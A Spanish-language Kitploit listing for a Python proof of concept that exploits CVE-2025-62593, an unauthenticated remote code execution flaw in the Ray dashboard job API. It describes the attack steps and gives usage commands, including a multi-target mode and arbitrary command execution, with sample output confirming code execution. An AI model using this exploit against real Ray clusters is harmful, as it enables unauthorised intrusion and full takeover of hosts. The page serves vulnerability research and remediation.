Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-62593-PoC — PoC para CVE-2025-62593: RCE no autenticado en Ray (CISA KEV). Python únicamente con stdlib. | Kitploit
Herramientas/GitHubGitHub/boreas37/cve-2025-62593-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de IA
GitHubboreas37/cve-2025-62593-poc

CVE-2025-62593-PoC

PoC para CVE-2025-62593: RCE no autenticado en Ray (CISA KEV). Python únicamente con stdlib.

Ver Repositorio
26hace 23 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-62593 — Ray Ejecución Remota de Código (sin autenticación)

Prueba de concepto para CVE-2025-62593, una vulnerabilidad de Ejecución Remota de Código sin autenticación en el motor de computación distribuida de IA Ray, explotada mediante ataques de rebinding de DNS basados en navegador. Fue añadida al catálogo de Vulnerabilidades Explotadas Conocidas (KEV) de CISA y está siendo explotada activamente.

La causa raíz es una decisión de diseño de larga data del equipo de Ray de ejecutar sin autenticación los endpoints HTTP críticos como /api/jobs y /api/job_agent/jobs. Debido a ello, un atacante remoto no autenticado puede enviar un Job de Ray cuyo entrypoint es un comando arbitrario, que luego se ejecuta en el nodo cabeza del clúster — ejecución remota de código completa.

Este PoC se comunica directamente con la API HTTP del Panel de Ray (no se necesita navegador/rebinding de DNS para demostrar el fallo subyacente) y recupera la salida del comando desde los registros del job.

Impacto

  • CVSS: Crítico (9.8)
  • Afectados: Ray < 2.52.0 (parche publicado para este aviso)
  • CISA KEV: Sí — explotación activa, plazo de remediación aplicado
  • Expone los más de ~200k clústeres de IA Ray accesibles públicamente a RCE sin autenticación previa

Qué hace

  1. POST /api/jobs/ con un entrypoint que ejecuta tu comando y captura su stdout/stderr en un archivo temporal, y luego imprime el archivo de vuelta.
  2. Consulta GET /api/jobs/ hasta que el job alcanza un estado terminal.
  3. Lee GET /api/jobs/<submission_id>/logs e imprime la salida del comando.

Uso

root@kitploit:~
# Objetivo único
python3 ray_rce_poc.py --target http://HOST:8265

# Comando personalizado
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"

# Múltiples objetivos desde un archivo (uno por línea, '#' = comentario)
python3 ray_rce_poc.py --targets targets.txt --command id

# Escribir un resumen JSON
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json

# Ayuda
python3 ray_rce_poc.py --help

Requiere solo la biblioteca estándar de Python 3 — sin dependencias de terceros.

Ejemplo (verificado contra un laboratorio Docker local)

root@kitploit:~
$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)

Referencias

  • Catálogo KEV de CISA
  • Aviso de Seguridad de GitHub GHSA-q279-jhrf-cc6v

Aviso legal

Para investigación de seguridad y pruebas autorizadas solamente. Úsalo solo contra sistemas que poseas o para los que tengas permiso explícito de prueba. El autor no es responsable del uso indebido.

Descargar herramienta